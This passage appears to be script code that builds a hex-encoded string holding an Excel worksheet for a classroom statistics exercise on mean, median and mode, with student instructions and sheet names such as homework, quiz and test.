000a00050000000f0005\"\r\nwD+=\"000000fd000a00050001000f000b0000007e020a00050002000f0000004940fd000a0006000\"\r\nwD+=\"0000f0006000000fd000a00060001000f00090000007e020a00060002000f0000c05040fd00\"\r\nwD+=\"0a00070000000f0007000000fd000a00070001000f00090000007e020a00070002000f00000\"\r\nwD+=\"04440fd000a00080000000f0008000000fd000a00080001000f000c0000007e020a00080002\"\r\nwD+=\"000f000000494006003300080003000f000000000000c051400000f00b37fc1d0024080002c\"\r\nwD+=\"0240a0002c024110002c0241a0002c0241b0002c042050500fd000a00090000000f000d0000\"\r\nwD+=\"00fd000a00090001000f000b0000007e020a00090002000f0000005440fd000a000a0000000\"\r\nwD+=\"f000e000000fd000a000a0001000f000c0000007e020a000a0002000f0000805140fd000a00\"\r\nwD+=\"0b0000000f0011000000fd000a000b0001000f000b0000007e020a000b0002000f000000594\"\r\nwD+=\"0fd000a000c0000000f000f000000fd000a000c0001000f00090000007e020a000c0002000f\"\r\nwD+=\"0000005940fd000a000d0000000f0023000000fd000a000d0001000f000a0000007e020a000\"\r\nwD+=\"d0002000f0000003440fd000a000e0000000f0010000000fd000a000e0001000f000a000000\"\r\nwD+=\"7e020a000e0002000f0000004940fd000a000f0000000f0012000000fd000a000f0001000f0\"\r\nwD+=\"00a0000007e020a000f0002000f0000004940fd000a00100000000f0013000000fd000a0010\"\r\nwD+=\"0001000f000a0000007e020a00100002000f0000003440fd000a00110000000f0014000000f\"\r\nwD+=\"d000a00110001000f000c0000007e020a00110002000f0000c05240fd000a00120000000f00\"\r\nwD+=\"15000000fd000a00120001000f00090000007e020a00120002000f0000005940fd000a00130\"\r\nwD+=\"000000f0016000000fd000a00130001000f00090000007e020a00130002000f0000000000fd\"\r\nwD+=\"000a00140000000f0017000000fd000a00140001000f00090000007e020a00140002000f000\"\r\nwD+=\"0000000fd000a00150000000f0018000000fd000a00150001000f000a0000007e020a001500\"\r\nwD+=\"02000f0000005940fd000a00160000000f0019000000fd000a00160001000f000a0000007e0\"\r\nwD+=\"20a00160002000f0000005440fd000a00170000000f001a000000fd000a00170001000f0009\"\r\nwD+=\"0000007e020a00170002000f0000005940fd000a00180000000f001b000000fd000a0018000\"\r\nwD+=\"1000f00090000007e020a00180002000f0000000000fd000a00190000000f001c000000fd00\"\r\nwD+=\"0a00190001000f000a0000007e020a00190002000f0000000000fd000a001a0000000f001d0\"\r\nwD+=\"00000fd000a001a0001000f000c0000007e020a001a0002000f0000005440fd000a001b0000\"\r\nwD+=\"000f001d000000fd000a001b0001000f000c0000007e020a001b0002000f0000005440fd000\"\r\nwD+=\"a001c0000000f001e000000fd000a001c0001000f00090000007e020a001c0002000f000000\"\r\nwD+=\"5940fd000a001d0000000f001f000000fd000a001d0001000f000b0000007e020a001d00020\"\r\nwD+=\"00f0000004440fd000a001e0000000f0020000000fd000a001e0001000f00090000007e020a\"\r\nwD+=\"001e0002000f0000005940fd000a001f0000000f001e000000fd000a001f0001000f000a000\"\r\nwD+=\"0007e020a001f0002000f0000805640d7004200ff070000580270002a002a002a002a002a00\"\r\nwD+=\"2a0061002a002a002a002a002a002a002a002a002a002a002a002a002a002a002a002a002a0\"\r\nwD+=\"02a002a002a002a002a0008021000220000000300ff000000000000010f0008021000230000\"\r\nwD+=\"000300ff000000000000010f0008021000260000000300ff000000000000010f00fd000a002\"\r\nwD+=\"2000000210039000000fd000a00220001000f003a000000fd000a00220002000f002a000000\"\r\nwD+=\"fd000a00230001000f003b0000007e020a00230002000f0000003440fd000a00260001000f0\"\r\nwD+=\"046000000d7000a009000000028002a001c00c2010c00050008000400090303004600ec00aa\"\r\nwD+=\"000f0002f0a2000000500008f00800000002000000011000000f0003f08a0000000f0004f02\"\r\nwD+=\"8000000010009f0100000000000000000000000000000000000000002000af0080000000010\"\r\nwD+=\"0000050000000f0004f052000000920c0af00800000001100000000a000043000bf01800000\"\r\nwD+=\"07f0004010401bf0008000800ff0100000800bf0300000200000010f0120000000100010000\"\r\nwD+=\"00010000000200000002000000000011f0000000005d0046001500120014000100012100000\"\r\nwD+=\"0005c229201000000000c00140000000000000000000000010008000000100000001300ee1f\"\r\nwD+=\"000008000800010300000a0014005700000000003e021200b60000000000400000000000000\"\r\nwD+=\"0000000001d000f00032600010000000100260026000101ef0006000500370000000a000000\"\r\nwD+=\"0908100000061000e228cd07c9c00000060200000b021400000000000000000020000000d67\"\r\nwD+=\"30000d97900000d00020001000c00020064000f000200010011000200000010000800fca9f1\"\r\nwD+=\"d24d62503f5f00020001002a00020000002b000200000082000200010080000800000000000\"\r\nwD+=\"0000000250204000000ff0081000200c1041400000015000000830002000000840002000000\"\r\nwD+=\"4d006a0300004500700073006f006e0020005300740079006c0075007300200043004f004c0\"\r\nwD+=\"04f005200200036003000300020004500530043002f005000200032000000000001040005dc\"\r\nwD+=\"008c0243ef800701000100ea0a6f08640001000f006801020001006801020001004c0065007\"\r\nwD+=\"400740065007200000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000010\"\r\nwD+=\"000000000000002000000020000000100000030010000000000000000000000000000000000\"\r\nwD+=\"0044494e55220000003402580053ab1e3f00000000000000000000000001000000000000000\"\r\nwD+=\"000000000000000080000000100000001000000000002000000040000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"00000580000004f535045414182820200000000000000010000000000000000000000000000\"\r\nwD+=\"0000000000010000000000000004000000000000000000000000000000000000006a0000000\"\r\nwD+=\"000000003000000010000000f000000a1002200010064000100010001000200680168010000\"\r\nwD+=\"00000000e03f000000000000e03f010055000200080000020e0000000000200000000000050\"\r\nwD+=\"0000008021000000000000500ff000000000000010f0008021000010000000500ff00000000\"\r\nwD+=\"0000010f0008021000020000000500ff000000000000010f0008021000030000000500ff000\"\r\nwD+=\"000000000010f0008021000040000000500ff000000000000010f0008021000050000000500\"\r\nwD+=\"ff000000000000010f0008021000060000000500ff000000000000010f00080210000700000\"\r\nwD+=\"00500ff000000000000010f0008021000080000000500ff000000000000010f000802100009\"\r\nwD+=\"0000000500ff000000000000010f00080210000a0000000500ff000000000000010f0008021\"\r\nwD+=\"0000b0000000500ff000000000000010f00080210000c0000000500ff000000000000010f00\"\r\nwD+=\"080210000d0000000500ff000000000000010f00080210000e0000000500ff0000000000000\"\r\nwD+=\"10f00080210000f0000000500ff000000000000010f0008021000100000000200ff00000000\"\r\nwD+=\"0000010f0008021000110000000200ff000000000000010f0008021000120000000200ff000\"\r\nwD+=\"000000000010f0008021000130000000200ff000000000000010f0008021000140000000200\"\r\nwD+=\"ff000000000000010f0008021000150000000200ff000000000000010f00080210001600000\"\r\nwD+=\"00200ff000000000000010f0008021000170000000200ff000000000000010f000802100018\"\r\nwD+=\"0000000200ff000000000000010f0008021000190000000200ff000000000000010f0008021\"\r\nwD+=\"0001a0000000200ff000000000000010f00080210001b0000000200ff000000000000010f00\"\r\nwD+=\"080210001c0000000200ff000000000000010f00080210001d0000000200ff0000000000000\"\r\nwD+=\"10f00080210001e0000000200ff000000000000010f00080210001f0000000200ff00000000\"\r\nwD+=\"0000010f00fd000a00000000000f002e000000fd000a00010000000f002d000000fd000a000\"\r\nwD+=\"10001000f002c000000fd000a00010003000f0032000000bd001200020000000f000000f03f\"\r\nwD+=\"0f00000049400100bd001200030000000f00000000400f00000045400100fd000a000300040\"\r\nwD+=\"00f002f000000bd001200040000000f00000008400f00000000400100060023000400040017\"\r\nwD+=\"004444444444844b4000002c0c37fd0d002502001f0001c001c042010500bd0012000500000\"\r\nwD+=\"00f00000010400f0000002a400100bd001200060000000f00000014400f00000050400100bd\"\r\nwD+=\"001200070000000f00000018400f00000052400100bd001200080000000f0000001c400f000\"\r\nwD+=\"08056400100fd000a00080004000f0030000000bd001200090000000f00000020400f000000\"\r\nwD+=\"5440010006002300090004000f0000000000000050400000040004ff0d002502001f0001c00\"\r\nwD+=\"1c04201e300bd0012000a0000000f00000022400f00000044400100bd0012000b0000000f00\"\r\nwD+=\"000024400f00008056400100bd0012000c0000000f00000026400f00000039400100bd00120\"\r\nwD+=\"00d0000000f00000028400f00000041400100fd000a000d0004000f0031000000bd0012000e\"\r\nwD+=\"0000000f0000002a400f0000c055400100060023000e0004000f00000000000000504000000\"\r\nwD+=\"90004fe0d006502001f0001c001c042014a01bd0012000f0000000f0000002c400f00004050\"\r\nwD+=\"400100bd001200100000000f0000002e400f00004053400100bd001200110000000f0000003\"\r\nwD+=\"0400f00008053400100bd001200120000000f00000031400f00000049400100bd0012001300\"\r\nwD+=\"00000f00000032400f00000000000100bd001200140000000f00000033400f0000005040010\"\r\nwD+=\"0bd001200150000000f00000034400f00008047400100bd001200160000000f00000035400f\"\r\nwD+=\"00000050400100bd001200170000000f00000036400f00000049400100bd001200180000000\"\r\nwD+=\"f00000037400f00004050400100bd001200190000000f00000038400f00000042400100bd00\"\r\nwD+=\"12001a0000000f00000039400f0000004c400100bd0012001b0000000f0000003a400f00000\"\r\nwD+=\"050400100bd0012001c0000000f0000003b400f0000c050400100bd0012001d0000000f0000\"\r\nwD+=\"003c400f00000037400100bd0012001e0000000f0000003d400f0000c052400100bd0012001\"\r\nwD+=\"f0000000f0000003e400f00004054400100d7004400eb0500006c020e002a00160024003d00\"\r\nwD+=\"16001600160024003d0016001600160024003d0016001600160016001600160016001600160\"\r\nwD+=\"01600160016001600160016001600c2010c0009000e000600090404000000ec00c8000f0002\"\r\nwD+=\"f036020000600008f00800000005000000051800000f0003f0060200000f0004f0280000000\"\r\nwD+=\"10009f0100000000000000000000000000000000000000002000af008000000001800000500\"\r\nwD+=\"00000f0004f078000000f2030af00800000005180000000a000093000bf0360000008000808\"\r\nwD+=\"d36018500010000008b0002000000bf0008000a004701933900004801e0eeffff8101410000\"\r\nwD+=\"08c001400000087f0300000c00000010f0120000000000020010020400b5000300600310009\"\r\nwD+=\"700000011f0000000005d001a00150012001e0005001160808d360158259201000000000000\"\r\nwD+=\"0000ec00080000000df000000000b6011200120200000000000000003f001000000000003c0\"\r\nwD+=\"0400000496e73657274206120636f7079206f662074686520646174612066726f6d206c6561\"\r\nwD+=\"737420746f20677265617465737420696e207468697320636f6c756d6e3c001000000000006\"\r\nwD+=\"00111003f00000000000000ec006c000f0004f06c000000a20c0af00800000001180000000a\"\r\nwD+=\"000073000bf02a0000008000d08d36018500010000008b0002000000bf0008000a0081010b0\"\r\nwD+=\"00008bf0110001000c00140000008000010f0120000000000050020020300e200080000000d\"\r\nwD+=\"00c400000011f0000000005d001a0015001200060001001160d08d360194269201000000000\"\r\nwD+=\"0000000ec00080000000df000000000b601120012020000000000000000e500100000000000\"\r\nwD+=\"3c00e60000416674657220796f752068617665207468652064657369726564206d65616e2c2\"\r\nwD+=\"06d656469616e20616e64206d6f646520706c65617365206c69737420746865206e756d6265\"\r\nwD+=\"727320696e206f7264657220746f2070726f766520746f206d6520796f75206861766520617\"\r\nwD+=\"2726976656420617420746865207269676874206d656469616e2e20204920776f756c642061\"\r\nwD+=\"6c736f206c696b6520796f7520746f2068696768746c6967687420746865206d6f646520627\"\r\nwD+=\"920636f6c6f72696e6720696e207468652063656c6c73207468617420636f6e7461696e2074\"\r\nwD+=\"6865206d6f64652e203c001000000000001b051100e500000000000000ec0066000f0004f06\"\r\nwD+=\"600000022060af00800000003180000000a000063000bf0240000008000208e36018b000200\"\r\nwD+=\"0000bf000800080081012e000008bf0110001000c00140000008000010f0120000000000020\"\r\nwD+=\"0b0020f005a00080070021400b500000011f0000000005d001a00150012001e000300116020\"\r\nwD+=\"8e3601782792010000000000000000ec00080000000df000000000b60112001202000000000\"\r\nwD+=\"0000000a1001000000000003c00a20000506c6561736520656e746572206120746578742062\"\r\nwD+=\"6f782068657265206578706c61696e2074686520737465707320696e766f6c76656420696e2\"\r\nwD+=\"066696e64696e6720746865206d65616e2c206d656469616e20616e64206d6f64652e202053\"\r\nwD+=\"6565206d7920646972656374696f6e73206f6e2066696e64696e6720746865206d65616e207\"\r\nwD+=\"46f2068656c7020796f75207769746820746865206f74686572732e3c00100000000000a603\"\r\nwD+=\"1100a100000000000000ec006c000f0004f06c000000720b0af00800000004180000000a000\"\r\nwD+=\"073000bf02a0000008000708e36018500010000008b0002000000bf0008000a0081010d0000\"\r\nwD+=\"08bf0110001000c00140000008000010f01200000000000200d00313002d000700b00321008\"\r\nwD+=\"800000011f0000000005d001a00150012001e0004001160708e360154289201000000000000\"\r\nwD+=\"0000ec00080000000df000000000b6011200120200000000000000005b001000000000003c0\"\r\nwD+=\"05c0000426f6e757320517565732e0a57726974652074686520737465707320666f72207468\"\r\nwD+=\"6520656173696573742077617920746f20617272616e67652074686520646174612066726f6\"\r\nwD+=\"d206c6561737420746f2067726561746573742e3c00100000001000be010f005b0000000000\"\r\nwD+=\"0000ec0018001f0005f010000000000017f00800000002000000051800003e021200b600000\"\r\nwD+=\"000004000000000000000000000001d000f00031b000c00000001001b001b000c0cef000600\"\r\nwD+=\"0500370000000a0000000908100000061000e228cd07c9c00000060200000b0214000000000\"\r\nwD+=\"0030000000d000000da800000dc8200000d00020001000c00020064000f0002000100110002\"\r\nwD+=\"00000010000800fca9f1d24d62503f5f00020001002a00020000002b0002000000820002000\"\r\nwD+=\"100800008000000000000000000250204000000ff0081000200c10414000000150000008300\"\r\nwD+=\"02000000840002000000a10022000000ff000100010001000401000c0c0c000000000000e03\"\r\nwD+=\"f000000000000e03f207455000200080000020e00030000000d00000000000b000000080210\"\r\nwD+=\"00030000000b00ff000000000000010f0008021000040000000b00ff000000000000010f000\"\r\nwD+=\"8021000050000000b00ff000000000000010f0008021000060000000b00ff00000000000001\"\r\nwD+=\"0f0008021000070000000b00ff000000000000010f0008021000080000000b00ff000000000\"\r\nwD+=\"000010f00080210000c0000000b00ff000000000000010f00fd000a00030000000f00510000\"\r\nwD+=\"00fd000a00030002000f0057000000fd000a00030004000f002f000000fd000a00030005000\"\r\nwD+=\"f0032000000fd000a00030006000f0031000000fd000a00030007000f005c000000fd000a00\"\r\nwD+=\"030008000f005d000000fd000a00030009000f005e000000fd000a00040000000f005200000\"\r\nwD+=\"0fd000a00040002000f0058000000fd000a00050000000f0053000000fd000a00050002000f\"\r\nwD+=\"0059000000fd000a00060000000f0054000000fd000a00060002000f005a000000fd000a000\"\r\nwD+=\"70000000f0055000000fd000a00070002000f005b000000fd000a00080000000f0056000000\"\r\nwD+=\"fd000a000c0002000f0050000000fd000a000c0003000f005f000000fd000a000c0004000f0\"\r\nwD+=\"060000000fd000a000c0005000f0061000000fd000a000c0006000f0062000000fd000a000c\"\r\nwD+=\"0007000f0063000000fd000a000c0008000f0064000000fd000a000c000a000f0065000000d\"\r\nwD+=\"7001200ea010000780070001c001c001c001c000e003e021200b60000000000400000000000\"\r\nwD+=\"0000000000001d000f00030300020000000100030006000202ef0006000500370000000a000\"\r\nwD+=\"0000908100000061000e228cd07c9c00000060200000b021400000000000500000007000000\"\r\nwD+=\"e5830000cd8400000d00020001000c00020064000f000200010011000200000010000800fca\"\r\nwD+=\"9f1d24d62503f5f00020001002a00020000002b000200000082000200010080000800000000\"\r\nwD+=\"0000000000250204000000ff0081000200c1041400000015000000830002000000840002000\"\r\nwD+=\"000a10022000000ff00010001000100040000020202000000000000e03f000000000000e03f\"\r\nwD+=\"207455000200080000020e00050000000700000002000900000008021000050002000900ff0\"\r\nwD+=\"00000000000010f0008021000060002000900ff000000000000010f00fd000a00050002000f\"\r\nwD+=\"003c000000fd000a00050003000f003d000000fd000a00050004000f002b000000fd000a000\"\r\nwD+=\"50005000f003e000000fd000a00050006000f003d000000fd000a00050007000f003f000000\"\r\nwD+=\"fd000a00050008000f0040000000fd000a00060002000f0041000000fd000a0006000300220\"\r\nwD+=\"042000000fd000a00060004000f003d000000fd000a00060005000f0043000000fd000a0006\"\r\nwD+=\"0006000f0044000000d7000800d0000000140062003e021200b600000000004000000000000\"\r\nwD+=\"000000000001d000f00030c000500000001000c000c000505ef000600050037000000670817\"\r\nwD+=\"00670800000000000000000000020001ffffffff004400000a0000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"00000000000000000000000000000000feff000005010200000000000000000000000000000\"\r\nwD+=\"0000001000000e0859ff2f94f6810ab9108002b27b3d930000000a800000007000000010000\"\r\nwD+=\"00400000000400000048000000080000006000000012000000700000000c000000880000000\"\r\nwD+=\"d0000009400000013000000a000000002000000e40400001e000000100000004d6172696520\"\r\nwD+=\"547265766973616e69001e0000000800000072696477616e00001e000000100000004d69637\"\r\nwD+=\"26f736f667420457863656c004000000080c44fcb9448c601400000008036c20bc0cacb0103\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"0000000000000000000000000000000000000000000000000feff0000050102000000000000\"\r\nwD+=\"00000000000000000000000100000002d5cdd59c2e1b10939708002b2cf9ae3000000028010\"\r\nwD+=\"0000900000001000000500000000f0000005800000017000000880000000b00000090000000\"\r\nwD+=\"100000009800000013000000a000000016000000a80000000d000000b00000000c000000050\"\r\nwD+=\"1000002000000e40400001e0000002800000054686520477265617465722047686574746f20\"\r\nwD+=\"466162756c6f757320466f756e646174696f6e000003000000d31a0a000b000000000000000\"\r\nwD+=\"b000000000000000b000000000000000b000000000000001e1000000800000004000000616c\"\r\nwD+=\"6c000300000063770003000000687700050000007175697a000500000074657374000500000\"\r\nwD+=\"073746174000a000000646576696174696f6e000a000000617667206772617068000c100000\"\r\nwD+=\"020000001e0000000b000000576f726b7368656574730003000000080000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"00000000000000000000000000000000000000000000000000000000000000000000